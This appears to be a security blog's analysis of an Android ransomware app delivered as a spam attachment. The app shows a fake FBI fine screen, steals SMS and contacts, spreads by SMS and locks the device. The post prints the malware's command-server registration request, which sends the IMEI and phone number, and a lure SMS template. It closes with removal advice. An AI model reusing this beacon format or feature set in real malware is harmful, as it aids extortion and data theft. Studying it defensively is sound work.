New Ransomware in Mobile environment

It is widely known the new malware trend, which has caused several problems in the last year: the infamous Ransomware (Cryptowall, Cryptolocker and its derivatives). 

Although we have seen samples in the mobile environment (Koler), it was not common to find traditional spam with such malicious applications, until now. 

In a generic spam e-mail we received days ago included a suspicious attachment named “Check Updates.apk” probably pretending to be a Flash Player update.

At first glance the application is far from being a software update, just by reviewing the images and HTML documents embedded.

These documents, that are going to be presented to the victim as a part of the scam process, follow the common scheme, in this case the scam is as follows: The FBI has detected, through the PRISM platform, that the user has browsed forbidden web pages and must pay a fine.

The app installation is pretty simple and after open it a video player menu will be displayed. (That is obviously fraudulent)

After seconds, the disclaimer window will pop up, stitched to the screen, avoiding the end user to close it or use other apps.

This message, unlike Koler’s ones, always remains the same, no matter where the end user is located. Here are some screenshot taken during this step:

Once the mobile device is locked and the ransom requested, the next step is the purchase and charge (500$) of a PayPal MyCash card in order to provide the card number to the botmaster using the app panel as we can see on the image above.

The app is pretty simple in a technical point of view. Requiring a high amount of privileges and using the platform features as a normal app (it does not use exploits or require root privileges). These are the main features:

  • The ransom disclaimer window is generated as a system alert, shown over other applications or windows.
  • The crypto system used is AES, using the standard library. The key and salt used are always the same (PBKDF2WithHmacSHA1):
  • Although the cipher and uncipher code is complete, there is no evidence on the Labs test performed, that the app really ciphers the external drive storage (target: /sdcard/Android/).
  • The app uses a third party library named Volley for the connections management.
  • To fright the end user some personal information is shown like: browser bookmarks, end user’s photo (taken from the front camera) and geo location based on the device IP.
  • The main functionalities are:
  1. SMS and contacts delivery to malicious server
  2. Incoming SMS capture
  3. SMS delivery through the device
  4. Cipher/Uncipher external SD storage
  5. Device lock and unlock
  • SMS Spread: The malicious server sends an SMS template to the device in order to send an SMS with the APK URL to the whole contact list (this was also observed in recent Koler samples)

Control Panel

The Control Panel URL is hardcoded in the bot code. Once the URL is resolved, is periodically queried to get new commands (using HTTP and JSON answers)

GET /pha?android_version=4.1.2&id=xxxxxxxxxx&phone_number=xxxxxxxxx&client_version=1.03&imei=xxxxxxxxxxxxxxxx&name=sdk

During the bot register, a SMS template and Geo location will be also received, as explained before

{“sms_template”: “OMG!!! Guess who’s on a video here, you will not believe it!!!  hxxp://”}

{“city”: “Madrid”, “ip”: “”, “lon”: yy.yyy, “lat”: zz.zzz, “country_code”: “ES”, “country_name”: “Spain”}

The server will also implement a backdoor access in order to control and query the bot.
This server contains a “app-download” website (similar to a third party market) which also serves the fake application.

Conclusion and Countermeasures 

The ransomware “boom” starts finding new distribution ways. Despite of being
pretty simple apps, they get their objective of extorting the end user. Methods used are very social engineering oriented, but new functionalities are added constantly (SMS capture, spreading)

As a counter measure, it is recommended to keep the “install from untrusted sources” disabled and filter out emails with .apk attachments.

If the malicious application is already installed, we can proceed cleaning the machine by “adb unsintall” (it requires USB active debugging) or rebooting the system in safe mode in order to delete it later on.

Deja un comentario